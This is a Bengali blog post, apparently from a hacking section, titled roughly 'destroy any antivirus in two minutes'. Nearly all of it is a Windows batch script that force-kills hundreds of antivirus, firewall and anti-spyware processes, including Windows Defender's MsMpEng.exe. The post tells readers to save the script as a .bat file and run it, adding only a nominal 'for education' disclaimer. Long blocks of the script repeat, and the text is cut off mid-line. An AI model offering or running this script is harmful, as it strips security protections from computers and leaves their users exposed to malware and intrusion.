«

»

zakirbd

মাত্র ২ মিনিটে যে কোন এন্টি ভাইরাস নষ্ট করে দিন

বি:দ্র:  এটি শুধু শিক্ষার জন্য। এটি দ্বারা কারো ক্ষতি  করার চেষ্টা করবেন  না।

আপনি মাত্র ২ মিনিটে যে কোন এন্টি ভাইরাস নষ্ট করে দিতে পারেন? কি বিশ্বাস হচ্ছে না? তাহলে নিচের কোড কপি করে .bat ফাইলে সেভ করূন দেন ওপেন করুন আর মজা দেথুন।

কোড:——————————————————————-
@Echo Off
Set finaliza=taskkill
Set limpa=cls
Set registro=reg add
Set apaga=del
%limpa%
%finaliza% /f /im nod32krn.exe
%limpa%
%finaliza% /f /im nod32.exe
%limpa%
%finaliza% /f /im nod32kui.exe
%limpa%
%finaliza% /f /im kav.exe
%limpa%
%finaliza% /f /im kavmm.exe
%limpa%
%finaliza% /f /im KAVPF.exe
%limpa%
%finaliza% /f /im avgemc.exe
%limpa%
%finaliza% /f /im avgcc.exe
%limpa%
%finaliza% /f /im avgamsvr.exe
%limpa%
%finaliza% /f /im avgupsvc.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im ashWebSv.exe
%limpa%
%finaliza% /f /im ashDisp.exe
%limpa%
%finaliza% /f /im ashmaisv.exe
%limpa%
%finaliza% /f /im ashserv.exe
%limpa%
%finaliza% /f /im aswupdsv.exe
%limpa%
%finaliza% /f /im ewidoctrl.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im gcasDtServ.exe
%limpa%
%finaliza% /f /im MsMpEng.exe
%limpa%
%finaliza% /f /im mcafee.exe
%limpa%
%finaliza% /f /im mghtml.exe
%limpa%
%finaliza% /f /im MsiExec.exe
%limpa%
%finaliza% /f /im outpost.exe
%limpa%
%finaliza% /f /im isafe.exe
%limpa%
%finaliza% /f /im zapro.exe
%limpa%
%finaliza% /f /im zauinst.exe
%limpa%
%finaliza% /f /im UpdClient.exe
%limpa%
%finaliza% /f /im zlcliente.exe
%limpa%
%finaliza% /f /im minilog.exe
%limpa%
%finaliza% /f /im zonealarm.exe
%limpa%
%finaliza% /f /im zlclient.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im ccsetmgr.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im Norton Auto-Protect.exe
%limpa%
%finaliza% /f /im cccproxy.exe
%limpa%
%finaliza% /f /im navw32.exe
%limpa%
%finaliza% /f /im norton.exe
%limpa%
%finaliza% /f /im navapsvc.exe
%limpa%
%finaliza% /f /im npfmntor.exe
%limpa%
%finaliza% /f /im logexprt.exe
%limpa%
%finaliza% /f /im nisum.exe
%limpa%
%finaliza% /f /im issvc.exe
%limpa%
%finaliza% /f /im cpdclnt.exe
%limpa%
%finaliza% /f /im pccntupd.exe
%limpa%
%finaliza% /f /im PCCTool.exe
%limpa%
%finaliza% /f /im tmproxy.exe
%limpa%
%finaliza% /f /im tmntsrv.exe
%limpa%
%finaliza% /f /im pop3trap.exe
%limpa%
%finaliza% /f /im tsc.exe
%limpa%
%finaliza% /f /im PavPrSrv.exe
%limpa%
%finaliza% /f /im padmin.exe
%limpa%
%finaliza% /f /im PavProt.exe
%limpa%
%finaliza% /f /im pandaav.exe
%limpa%
%finaliza% /f /im avengine.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im webProxy.exe
%limpa%
%finaliza% /f /im avguard.exe
%limpa%
%finaliza% /f /im avgnt.exe
%limpa%
%finaliza% /f /im sched.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im SCCOMM.EXE
%limpa%
%finaliza% /f /im Spiderml.exe
%limpa%
%finaliza% /f /im vsserv.exe
%limpa%
%finaliza% /f /im bdswitch.exe
%limpa%
%finaliza% /f /im bdss.exe
%limpa%
%finaliza% /f /im INOTask.exe
%limpa%
%finaliza% /f /im caissdt.exe
%limpa%
%finaliza% /f /im InoRpc.exe
%limpa%
%finaliza% /f /im VetMsg.exe
%limpa%
%finaliza% /f /im vettray.exe
%limpa%
%finaliza% /f /im realmon.exe
%limpa%
%finaliza% /f /im nod32krn.exe
%limpa%
%finaliza% /f /im nod32.exe
%limpa%
%finaliza% /f /im nod32kui.exe
%limpa%
%finaliza% /f /im kav.exe
%limpa%
%finaliza% /f /im kavmm.exe
%limpa%
%finaliza% /f /im KAVPF.exe
%limpa%
%finaliza% /f /im avgemc.exe
%limpa%
%finaliza% /f /im avgcc.exe
%limpa%
%finaliza% /f /im avgamsvr.exe
%limpa%
%finaliza% /f /im avgupsvc.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im ashWebSv.exe
%limpa%
%finaliza% /f /im ashDisp.exe
%limpa%
%finaliza% /f /im ashmaisv.exe
%limpa%
%finaliza% /f /im ashserv.exe
%limpa%
%finaliza% /f /im aswupdsv.exe
%limpa%
%finaliza% /f /im ewidoctrl.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im gcasDtServ.exe
%limpa%
%finaliza% /f /im MsMpEng.exe
%limpa%
%finaliza% /f /im mcafee.exe
%limpa%
%finaliza% /f /im mghtml.exe
%limpa%
%finaliza% /f /im MsiExec.exe
%limpa%
%finaliza% /f /im outpost.exe
%limpa%
%finaliza% /f /im isafe.exe
%limpa%
%finaliza% /f /im zapro.exe
%limpa%
%finaliza% /f /im zauinst.exe
%limpa%
%finaliza% /f /im UpdClient.exe
%limpa%
%finaliza% /f /im zlcliente.exe
%limpa%
%finaliza% /f /im minilog.exe
%limpa%
%finaliza% /f /im zonealarm.exe
%limpa%
%finaliza% /f /im zlclient.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im ccsetmgr.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im Norton Auto-Protect.exe
%limpa%
%finaliza% /f /im cccproxy.exe
%limpa%
%finaliza% /f /im navw32.exe
%limpa%
%finaliza% /f /im norton.exe
%limpa%
%finaliza% /f /im navapsvc.exe
%limpa%
%finaliza% /f /im npfmntor.exe
%limpa%
%finaliza% /f /im logexprt.exe
%limpa%
%finaliza% /f /im nisum.exe
%limpa%
%finaliza% /f /im issvc.exe
%limpa%
%finaliza% /f /im cpdclnt.exe
%limpa%
%finaliza% /f /im pccntupd.exe
%limpa%
%finaliza% /f /im PCCTool.exe
%limpa%
%finaliza% /f /im tmproxy.exe
%limpa%
%finaliza% /f /im tmntsrv.exe
%limpa%
%finaliza% /f /im pop3trap.exe
%limpa%
%finaliza% /f /im tsc.exe
%limpa%
%finaliza% /f /im PavPrSrv.exe
%limpa%
%finaliza% /f /im padmin.exe
%limpa%
%finaliza% /f /im PavProt.exe
%limpa%
%finaliza% /f /im pandaav.exe
%limpa%
%finaliza% /f /im avengine.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im webProxy.exe
%limpa%
%finaliza% /f /im avguard.exe
%limpa%
%finaliza% /f /im avgnt.exe
%limpa%
%finaliza% /f /im sched.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im SCCOMM.EXE
%limpa%
%finaliza% /f /im Spiderml.exe
%limpa%
%finaliza% /f /im vsserv.exe
%limpa%
%finaliza% /f /im bdswitch.exe
%limpa%
%finaliza% /f /im bdss.exe
%limpa%
%finaliza% /f /im INOTask.exe
%limpa%
%finaliza% /f /im caissdt.exe
%limpa%
%finaliza% /f /im InoRpc.exe
%limpa%
%finaliza% /f /im VetMsg.exe
%limpa%
%finaliza% /f /im vettray.exe
%limpa%
%finaliza% /f /im realmon.exe
%limpa%
%finaliza% /F /IM AVGUARD.exe
%limpa%
%finaliza% /F /IM AVGCtrl.exe
%limpa%
%finaliza% /F /IM CSS_1630.exe
%limpa%
%finaliza% /F /IM CSS-AVS.exe
%limpa%
%finaliza% /F /IM ashdisp.exe
%limpa%
%finaliza% /F /IM ashmaisv.exe
%limpa%
%finaliza% /F /IM ashserv.exe
%limpa%
%finaliza% /F /IM ashwebsv.exe
%limpa%
%finaliza% /F /IM aswupdsv.exe
%limpa%
%finaliza% /F /IM AVGCC.exe
%limpa%
%finaliza% /F /IM AVGCC32.exe
%limpa%
%finaliza% /F /IM AVGEmc.exe
%limpa%
%finaliza% /F /IM AVGServ.exe
%limpa%
%finaliza% /F /IM AVGServ9.exe
%limpa%
%finaliza% /F /IM Avgw.exe
%limpa%
%finaliza% /F /IM vsserv.exe
%limpa%
%finaliza% /F /IM ewidoguard.exe
%limpa%
%finaliza% /F /IM ewidoctrl.exe
%limpa%
%finaliza% /F /IM kav.exe
%limpa%
%finaliza% /F /IM kavsvc.exe
%limpa%
%finaliza% /F /IM MPFAgent.exe
%limpa%
%finaliza% /F /IM MPFTray.exe
%limpa%
%finaliza% /F /IM Mscifapp.exe
%limpa%
%finaliza% /F /IM MSKSrvr.exe
%limpa%
%finaliza% /F /IM NOD32Krn.exe
%limpa%
%finaliza% /F /IM NOD32Kui.exe
%limpa%
%finaliza% /F /IM PavPrS9x.exe
%limpa%
%finaliza% /F /IM NPFMntor.exe
%limpa%
%finaliza% /F /IM Nprotect.exe
%limpa%
%finaliza% /F /IM Nsched32.exe
%limpa%
%finaliza% /F /IM SymWSC.exe
%limpa%
%finaliza% /f /IM SpywareStrike.exe /IM SpywareStrike.exe
%limpa%
%finaliza% /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
%limpa%
%finaliza% /f /IM symlcsvc.exe
%limpa%
%finaliza% /f /IM SymWSC.exe /IM UsrPrmpt.exe
%limpa%
%finaliza% /f /IM zlclient.exe /IM zonealarm.exe
%limpa%
%finaliza% /f /IM ewidoctrl.exe
%limpa%
%finaliza% /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
%limpa%
%finaliza% /f /IM WRSSSDK.exe /IM SpySweeper.exe
%limpa%
%finaliza% /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
%limpa%
%finaliza% /f /IM kavsvc.exe /IM kav.exe
%limpa%
%finaliza% /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe
%limpa%
%finaliza% /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
%limpa%
%finaliza% /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
%limpa%
%finaliza% /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
%limpa%
%finaliza% /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe
%limpa%
%finaliza% /f /IM DefWatch.exe /IM Rtvscan.exe
%limpa%
%finaliza% /f /IM avgamsvr.exe /IM avgupsvc.exe
%limpa%
%finaliza% /f /im nod32krn.exe
%limpa%
%finaliza% /f /im nod32.exe
%limpa%
%finaliza% /f /im kav.exe
%limpa%
%finaliza% /f /im kavmm.exe
%limpa%
%finaliza% /f /im avgemc.exe
%limpa%
%finaliza% /f /im avgcc.exe
%limpa%
%finaliza% /f /im avgamsvr.exe
%limpa%
%finaliza% /f /im avgupsvc.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im ashwebsv.exe
%limpa%
%finaliza% /f /im ashdisp.exe
%limpa%
%finaliza% /f /im ashmaisv.exe
%limpa%
%finaliza% /f /im ashserv.exe
%limpa%
%finaliza% /f /im ashwebsv.exe
%limpa%
%finaliza% /f /im aswupdsv.exe
%limpa%
%finaliza% /f /im ewidoctrl.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im gcasdtserv.exe
%limpa%
%finaliza% /f /im msmpeng.exe
%limpa%
%finaliza% /f /im mcafee.exe
%limpa%
%finaliza% /f /im mghml.exe
%limpa%
%finaliza% /f /im msiexec.exe
%limpa%
%finaliza% /f /im outpost.exe
%limpa%
%finaliza% /f /im isafe.exe
%limpa%
%finaliza% /f /im minilog.exe
%limpa%
%finaliza% /f /im zonealarm.exe
%limpa%
%finaliza% /f /im zlclient.exe
%limpa%
%finaliza% /f /im updclient.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im navw32.exe
%limpa%
%finaliza% /f /im norton.exe
%limpa%
%finaliza% /f /im navapsvc.exe
%limpa%
%finaliza% /f /im ccsetmgr.exe
%limpa%
%finaliza% /f /im cccproxy.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im npfmntor.exe
%limpa%
%finaliza% /f /im logexprt.exe
%limpa%
%finaliza% /f /im nisum.exe
%limpa%
%finaliza% /f /im issvc.exe
%limpa%
%finaliza% /f /im cpdclnt.exe
%limpa%
%finaliza% /f /im pavprsrv.exe
%limpa%
%finaliza% /f /im pavprot.exe
%limpa%
%finaliza% /f /im avengine.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im webproxy.exe
%limpa%
%finaliza% /f /im avguard.exe
%limpa%
%finaliza% /f /im avgnt.exe
%limpa%
%finaliza% /f /im shed.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im sccomm.exe
%limpa%
%finaliza% /f /im spiderml.exe
%limpa%
%finaliza% /f /im sgmain.exe
%limpa%
%finaliza% /f /im spywareguard.exe
%limpa%
%finaliza% /f /im kpf4gui.exe
%limpa%
%finaliza% /f /im kpf4ss.exe
%limpa%
%finaliza% /f /im mcdash.exe
%limpa%
%finaliza% /f /im mcdetect.exe
%limpa%
%finaliza% /f /im mcregwiz.exe
%limpa%
%finaliza% /f /im mcinfo.exe
%limpa%
%finaliza% /f /im mghtml.exe
%limpa%
%finaliza% /f /im oasclnt.exe
%limpa%
%finaliza% /f /im mpfagent.exe
%limpa%
%finaliza% /f /im mpfconsole.exe
%limpa%
%finaliza% /f /im mpfservice.exe
%limpa%
%finaliza% /f /im mpftray.exe
%limpa%
%finaliza% /f /im mpfwizard.exe
%limpa%
%finaliza% /f /im mvtx.exe
%limpa%
%finaliza% /f /im _avp32.exe
%limpa%
%finaliza% /f /im _avpcc.exe
%limpa%
%finaliza% /f /im _avpm.exe
%limpa%
%finaliza% /f /im ackwin32.exe
%limpa%
%finaliza% /f /im advxdwin.exe
%limpa%
%finaliza% /f /im agentsvr.exe
%limpa%
%finaliza% /f /im agv.exe
%limpa%
%finaliza% /f /im ahnsd.exe
%limpa%
%finaliza% /f /im alertsvc.exe
%limpa%
%finaliza% /f /im alogserv.exe
%limpa%
%finaliza% /f /im amon.exe
%limpa%
%finaliza% /f /im amon9x.exe
%limpa%
%finaliza% /f /im amonavp32.exe
%limpa%
%finaliza% /f /im anti -trojan.exe
%limpa%
%finaliza% /f /im antivir.exe
%limpa%
%finaliza% /f /im antivirus.exe
%limpa%
%finaliza% /f /im ants.exe
%limpa%
%finaliza% /f /im antssircam.exe
%limpa%
%finaliza% /f /im apimonitor.exe
%limpa%
%finaliza% /f /im aplica32.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im atcon.exe
%limpa%
%finaliza% /f /im atguard.exe
%limpa%
%finaliza% /f /im ats.exe
%limpa%
%finaliza% /f /im atscan.exe
%limpa%
%finaliza% /f /im atupdater.exe
%limpa%
%finaliza% /f /im atwatch.exe
%limpa%
%finaliza% /f /im autodown.exe
%limpa%
%finaliza% /f /im autotrace.exe
%limpa%
%finaliza% /f /im autoupdate.exe
%limpa%
%finaliza% /f /im avconsol.exe
%limpa%
%finaliza% /f /im ave32.exe
%limpa%
%finaliza% /f /im avgcc32.exe
%limpa%
%finaliza% /f /im avgctrl.exe
%limpa%
%finaliza% /f /im avgserv.exe
%limpa%
%finaliza% /f /im avgserv9.exe
%limpa%
%finaliza% /f /im avgserv9schedapp.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im avkpop.exe
%limpa%
%finaliza% /f /im avkserv.exe
%limpa%
%finaliza% /f /im avkservice.exe
%limpa%
%finaliza% /f /im avkwcl9.exe
%limpa%
%finaliza% /f /im avkwctl9.exe
%limpa%
%finaliza% /f /im avnt.exe
%limpa%
%finaliza% /f /im avp.exe
%limpa%
%finaliza% /f /im avp32.exe
%limpa%
%finaliza% /f /im avpcc.exe
%limpa%
%finaliza% /f /im AVPCC Service.exe
%limpa%
%finaliza% /f /im avpccavpm.exe
%limpa%
%finaliza% /f /im avpdos32.exe
%limpa%
%finaliza% /f /im avpexec.exe
%limpa%
%finaliza% /f /im avpinst.exe
%limpa%
%finaliza% /f /im avpm.exe
%limpa%
%finaliza% /f /im avpmonitor.exe
%limpa%
%finaliza% /f /im avptc.exe
%limpa%
%finaliza% /f /im avptc32.exe
%limpa%
%finaliza% /f /im avpupd.exe
%limpa%
%finaliza% /f /im avpupdates.exe
%limpa%
%finaliza% /f /im avrescue.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im avsynmgr.exe
%limpa%
%finaliza% /f /im avwin95.exe
%limpa%
%finaliza% /f /im avwinnt.exe
%limpa%
%finaliza% /f /im avwupd32.exe
%limpa%
%finaliza% /f /im avxgui.exe
%limpa%
%finaliza% /f /im avxinit.exe
%limpa%
%finaliza% /f /im avxlive.exe
%limpa%
%finaliza% /f /im avxmonitor9x.exe
%limpa%
%finaliza% /f /im avxmonitornt.exe
%limpa%
%finaliza% /f /im avxnews.exe
%limpa%
%finaliza% /f /im avxquar.exe
%limpa%
%finaliza% /f /im avxsch.exe
%limpa%
%finaliza% /f /im avxw.exe
%limpa%
%finaliza% /f /im BACKLOG.exe
%limpa%
%finaliza% /f /im bd_professional.exe
%limpa%
%finaliza% /f /im bidef.exe
%limpa%
%finaliza% /f /im bidserver.exe
%limpa%
%finaliza% /f /im bipcp.exe
%limpa%
%finaliza% /f /im bisp.exe
%limpa%
%finaliza% /f /im blackd.exe
%limpa%
%finaliza% /f /im blackice.exe
%limpa%
%finaliza% /f /im blackiceblackd.exe
%limpa%
%finaliza% /f /im BootWarn.exe
%limpa%
%finaliza% /f /im borg2.exe
%limpa%
%finaliza% /f /im bs120.exe
%limpa%
%finaliza% /f /im bullguard.exe
%limpa%
%finaliza% /f /im ccApp.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im ccIMScan.exe
%limpa%
%finaliza% /f /im ccPwdSrc.exe
%limpa%
%finaliza% /f /im ccpxysvc.exe
%limpa%
%finaliza% /f /im ccSetMgr.exe
%limpa%
%finaliza% /f /im cdp.exe
%limpa%
%finaliza% /f /im cfiadmin.exe
%limpa%
%finaliza% /f /im cfiaudit.exe
%limpa%
%finaliza% /f /im cfinet.exe
%limpa%
%finaliza% /f /im cfinet32.exe
%limpa%
%finaliza% /f /im claw95.exe
%limpa%
%finaliza% /f /im claw95cf.exe
%limpa%
%finaliza% /f /im clean.exe
%limpa%
%finaliza% /f /im cleaner.exe
%limpa%
%finaliza% /f /im cleaner3.exe
%limpa%
%finaliza% /f /im cleanpc.exe
%limpa%
%finaliza% /f /im cmgrdian.exe
%limpa%
%finaliza% /f /im cmon016.exe
%limpa%
%finaliza% /f /im codered.exe
%limpa%
%finaliza% /f /im connectionmonitor.exe
%limpa%
%finaliza% /f /im conseal.exe
%limpa%
%finaliza% /f /im cpd.exe
%limpa%
%finaliza% /f /im cpf9x206.exe
%limpa%
%finaliza% /f /im ctrl.exe
%limpa%
%finaliza% /f /im defalert.exe
%limpa%
%finaliza% /f /im defence.exe
%limpa%
%finaliza% /f /im defense.exe
%limpa%
%finaliza% /f /im defscangui.exe
%limpa%
%finaliza% /f /im defwatch.exe
%limpa%
%finaliza% /f /im deputy.exe
%limpa%
%finaliza% /f /im doors.exe
%limpa%
%finaliza% /f /im dpf.exe
%limpa%
%finaliza% /f /im drwatson.exe
%limpa%
%finaliza% /f /im drweb32.exe
%limpa%
%finaliza% /f /im dvp95.exe
%limpa%
%finaliza% /f /im dvp95_0.exe
%limpa%
%finaliza% /f /im ecengine.exe
%limpa%
%finaliza% /f /im edisk.exe
%limpa%
%finaliza% /f /im efpeadm.exe
%limpa%
%finaliza% /f /im esafe.exe
%limpa%
%finaliza% /f /im escanh95.exe
%limpa%
%finaliza% /f /im escanhnt.exe
%limpa%
%finaliza% /f /im escanv95.exe
%limpa%
%finaliza% /f /im espwatch.exe
%limpa%
%finaliza% /f /im etrustcipe.exe
%limpa%
%finaliza% /f /im evpn.exe
%limpa%
%finaliza% /f /im exantivirus -cnet.exe
%limpa%
%finaliza% /f /im fameh32.exe
%limpa%
%finaliza% /f /im fast.exe
%limpa%
%finaliza% /f /im fch32.exe
%limpa%
%finaliza% /f /im fih32.exe
%limpa%
%finaliza% /f /im findviru.exe
%limpa%
%finaliza% /f /im firewall.exe
%limpa%
%finaliza% /f /im fix-it.exe
%limpa%
%finaliza% /f /im flowprotector.exe
%limpa%
%finaliza% /f /im fnrb32.exe
%limpa%
%finaliza% /f /im fp -win.exe
%limpa%
%finaliza% /f /im fp -win_trial.exe
%limpa%
%finaliza% /f /im fprot.exe
%limpa%
%finaliza% /f /im frw.exe
%limpa%
%finaliza% /f /im fsaa.exe
%limpa%
%finaliza% /f /im fsav32.exe
%limpa%
%finaliza% /f /im fsav95.exe
%limpa%
%finaliza% /f /im fsave32.exe
%limpa%
%finaliza% /f /im fsgk32.exe
%limpa%
%finaliza% /f /im fsm32.exe
%limpa%
%finaliza% /f /im fsma32.exe
%limpa%
%finaliza% /f /im fsmb32.exe
%limpa%
%finaliza% /f /im fwenc.exe
%limpa%
%finaliza% /f /im gbmenu.exe
%limpa%
%finaliza% /f /im gbpoll.exe
%limpa%
%finaliza% /f /im gedit.exe
%limpa%
%finaliza% /f /im generics.exe
%limpa%
%finaliza% /f /im grief3878.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im guarddog.exe
%limpa%
%finaliza% /f /im HackerEliminator.exe
%limpa%
%finaliza% /f /im iamapp.exe
%limpa%
%finaliza% /f /im iamserv.exe
%limpa%
%finaliza% /f /im iamstats.exe
%limpa%
%finaliza% /f /im ibmasn.exe
%limpa%
%finaliza% /f /im ibmavsp.exe
%limpa%
%finaliza% /f /im icload95.exe
%limpa%
%finaliza% /f /im icloadnt.exe
%limpa%
%finaliza% /f /im icmon.exe
%limpa%
%finaliza% /f /im icsupp95.exe
%limpa%
%finaliza% /f /im icsuppnt.exe
%limpa%
%finaliza% /f /im iface.exe
%limpa%
%finaliza% /f /im ifw2000.exe
%limpa%
%finaliza% /f /im inoculateit.exe
%limpa%
%finaliza% /f /im iomon98.exe
%limpa%
%finaliza% /f /im iparmor.exe
%limpa%
%finaliza% /f /im iris.exe
%limpa%
%finaliza% /f /im isrv95.exe
%limpa%
%finaliza% /f /im jammer.exe
%limpa%
%finaliza% /f /im jedi.exe
%limpa%
%finaliza% /f /im kavpf.exe
%limpa%
%finaliza% /f /im ldnetmon.exe
%limpa%
%finaliza% /f /im ldpromenu.exe
%limpa%
%finaliza% /f /im ldscan.exe
%limpa%
%finaliza% /f /im localnet.exe
%limpa%
%finaliza% /f /im lockdown.exe
%limpa%
%finaliza% /f /im lookout.exe
%limpa%
%finaliza% /f /im luall.exe
%limpa%
%finaliza% /f /im lucomse

মন্তব্য দিনঃ

comments

About the author

zakirbd

zakirbd

symbols like ! " ? $ % ^ &..........................

Permanent link to this article: http://techtweets.com.bd/hacking-antihacking/zakirbd/25026